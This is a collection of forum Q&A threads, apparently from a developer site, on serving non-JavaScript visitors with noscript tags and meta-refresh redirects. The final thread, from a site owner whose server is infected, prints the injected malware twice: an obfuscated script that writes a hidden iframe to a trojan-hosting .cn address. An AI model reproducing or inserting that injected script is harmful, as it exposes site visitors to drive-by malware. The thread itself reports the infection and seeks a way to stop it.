I was talking with a friend about users who do not have javascript enabled in their browser and what could be done to show them a "no-javascript" version of your website.
Is it possible and how can it be done?
Thoughts?
Don't try to build separate JS and non-JS versions of the site. Build a non-JS version and then enhance it with JS. This makes it easier to reuse code, allows you to use object/feature detection for the entire stack, and makes it less likely that users without JavaScript will be left behind if developers update one branch of the site but not the other.
If you mean javascript, look up the <noscript> HTML tag.
If you are talking about JavaScript and want an alternate version of your site for those without, simply give them site without and put this at the top of your page:
<script type="text/javascript">
location.replace('http:javascript-version-of-your-site');
</script>
Like this:
<html>
<head>
<noscript>
<meta http-equiv="refresh" content="0;url=http://foo/noscript.htm" />
</noscript>
</head>
<body>
...
The meta refresh (declarative redirect) only gets executed if there is no script enabled on the browser. Of course, the noscript tag is only understood by browsers that have a javascript engine. If you're trying to catch browsers that have NO javascript at all (I don't know of many) then this won't work.
I use this combination of JavaScript and CSS
<html>
<style type="text/css">
.js-on
{
display: none;
}
.js-off
{
background: red;
color: White;
}
</style>
<div id='jsdetect' class='js-off'><b>Javascript is OFF</b></div>
<script type="text/javascript">
document.getElementById('jsdetect').className = 'js-on';
</script>
</html>
It's useful if your only aim is to tell the users that Javascript is not available and that the site will not work.
You can put some code to log/track/alert you about users who have JavaScript disabled by using the tag.
<noscript>
// Do Something
</noscript>
Another option open to you rather than the obvious noscript tag is to use JavaScript to drop a cookie, and then test for that cookie and deliver content appropriately. javascript ver vs non redirect or span
just thought I'd throw that in there..
Related
I am having a huge problem. I need to prevent access to non javascript users for a page on my website. I am not very technical when it comes to websites, hmtl or java ect. But I have a page that i would like non javascript users to not be able to access. I have tried lots of code from here in my header and footer such as
<noscript>
<meta http-equiv="refresh" content="0; URL=nojs/index.php">
</noscript>
but it does not work.
To put this into more detail my problem is that a host a webpage with a list of download links. There is an app (web browser) for amazon devices (android) that accesses webpages and allows you to download but it comes with javascript disabled by default.
This means that my Ads dont show and i am now getting 40TB a month bandwidth usage from people using this software which means i may have to pull the site soon as it costs more to run than the ads give back.
I think i need to either block non javascript users. Or is there a way i can make my links on that page in javascript so that none javascript users cant see or use them?
In an ideal world i would just like to display a message saying please enable javascript in settings but i have tried many header codes with no success. Any help here greatly appreciated
I tried using the meta tag inside the noscript tags like you did, and it worked fine for me. Try using an absolute link to your nojs page instead of the relative one you have. I don't know of a way to completely block nonjs users. Another option would be to use the noscript tags to hide the content of your html pages when js is disabled. This won't completely disable nonjs users from seeing your pages since if they are tech-savy they could use inspect-element to unhide the page content, but for the most part it should do a good job of preventing nonjs users from viewing your page. You can also include a no script alert. For example:
<!DOCTYPE html>
<html>
<head>
<title>
</title>
<noscript>
<style>
div.content {
display: none;
}
</style>
</noscript>
</head>
<body>
<noscript>
Please enable Javascript to view this Page
</noscript>
<div class=content>
Page Content Here
</div>
</body>
</html>
I'm developing in PHP, using Curl to follow links to their final destination. I occasionally reach a page with a meta tag redirection or a javascript redirection, and want to be smart enough to follow them. If a page has both, which should I follow (i.e., which would fire first)?
Sample meta tag refresh:
<meta http-equiv="refresh" content="0;URL='http://location1.com/'">
Sample javascript refresh:
<script>
window.location.href='http://location2.com/';
</script>
Just created this file ( let's call it test.html )
<html>
<head>
<meta http-equiv="refresh" content="0;URL='http://location1.com/'">
<script type="text/javascript">
window.location.href='http://location2.com/';
</script>
</head>
<body>
Hello
</body>
</html>
You can copy and save it. Once you open it, you'll be directed to http://location2.com
Do note that if the <script> tag is not in the <head> tag, the <meta> tag gets executed first.
Hexblot's answer is a good idea -- just try it out if you want to see what happens. However, when I did try it out, Chrome went to location2, and IE went to location1. So it seems to be implementation dependent. You might want to have this be a configurable option on your script. In practice, though, any site that has one redirect in a meta tag and a different one in a script, is (a) unlikely, and (b) not coded very well, as they have no idea where you'll end up.
I don't think there is a good way to detect which one would fire first.
The meta tag has the content attribute which can be used to specify a timeout. However, in JavaScript it is nearly impossible to detect when the redirect will happen as there are infinite ways to write it. At least not without executing it. Example:
var t = 100;
setTimeout(function () {
window.location.href='http://location2.com/';
}, t * 2);
I am creating a personal website.So,its a very lightweight website!
The website uses jquery heavily.So if target browser doesn't have javascript enabled,my website would not work.
To resolve this issue I used this html
<html>
<head>
<script>
window.location.href="javascriptEnabled.html";
/*Since javascript is enabled redirect to javascript based page*/
</script>
</head>
<body>
Showing Static Website since javascript is not enabled..
</body>
</html>
As you can see,I am redirecting to javascript enabled page if the target browser supports it.
But if javascript is not enabled,the script would not work and then static html would be loaded which is in body tag!
I have two questions.
1>Is this the best way to resolve javacript-no javascript issue browser issue?
2>If I use window.location.href and the browser is javascript enabled,would it download the full page or would it stop at window.location.href?
To keep things simple, yes it's an OK idea. You can load content with <noscript> tags
As soon as the browser hits that window.location.href it will start redirecting, but it will still download all DOM. Browsers download all Document then it will start to render.
You can use: <body onload="document.body.style.display = 'none';"> to hide it's contents until redirect occurs.
I have a site which relies heavily on javaScript. I created a mirror site, which has all the JS as well as all the elements that require JS removed. What is a good, easy way to redirect users to the mirror site if they don't have javaScript enabled?
I tried this, but it doesn't seem very good:
<noscript>
<meta http-equiv="refresh" content="0; URL=nojs/index.php">
</noscript>
I also tried to putting header-redirect into the noscript tag, but that didn't work.
<noscript>
<p>This site is best viewed with Javascript. If you are unable to turn on Javascript, please use this site.</p>
</noscript>
Some people purposely disable Javascript, and you might want to give them a chance to turn it on before redirecting them.
Use this code that I came up with:
<noscript>
<style>html{display:none;}</style>
<meta http-equiv="refresh" content="0.0;url=nojs/index.php">
</noscript>
It uses style to block what's on the page so then people won't notice anything before it redirects. The only thing that annoys me is that I want something better than meta refresh as that can be blocked on some browsers like IE. A PHP header isn't really a solution as you can't put it in a noscript tag as it will just ignore it and write it out straight away.
Make the no-JavaScript version of the site the default. Include a small script in there to redirect to the scripted site.
Or, abandon the use of a redirect entirely and go with Progressive Enhancement
What is your definition of "not very good"?
All my sites use:
<noscript>
<meta http-equiv="refresh" content="0; url=http://www.sadtrombone.com/" />
</noscript>
I wouldn't do client-side redirection, as that might seem annoying to the user. Instead, what I would do is use <noscript> to show the content of this JS-less site on the same page. It may be more work, but it would definitely be a smoother experience.
I came up with a better solution than having to redirect the user as meta-refresh can be disabled in IE.
Put this in the HEAD:
<style>div#body{display:none;}</style>
Put this in the BODY:
<noscript>NO JAVASCRIPT CONTENT HERE</noscript>
<noscript><div id="body"></noscript>JAVASCRIPT CONTENT HERE<noscript></div></noscript>
That way the tags are where they're meant to be.
Just simply put this code to your html file
<meta http-equiv = "refresh" content = "2; url = https://www.google.com" />
<!DOCTYPE html>
<html>
<head>
<title>Redirection</title>
<meta http-equiv = "refresh" content = "2; url = https://www.tutorialspoint.com" />
</head>
<body>
<p>This page will redirect in 2 seconds.</p>
</body>
</html>
The server that has my website on it also has a virus on it.
The virus injects the malicious code
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.
I created a test file, with the following code:
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
</body>
</html>
It isn't pretty, but it served its purpose.
When viewing the page in my browser, I get
<html>
<head>
<title>Test HTML File</title>
</head>
<body>
<h1>Test HTML File</h1>
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>
</body>
</html>
which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)
I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.
It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?
Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!
EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459
I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.
Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.
The file that is in your server is a php file look in the comments here.
Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.
You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).
It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.
Best of luck with the server!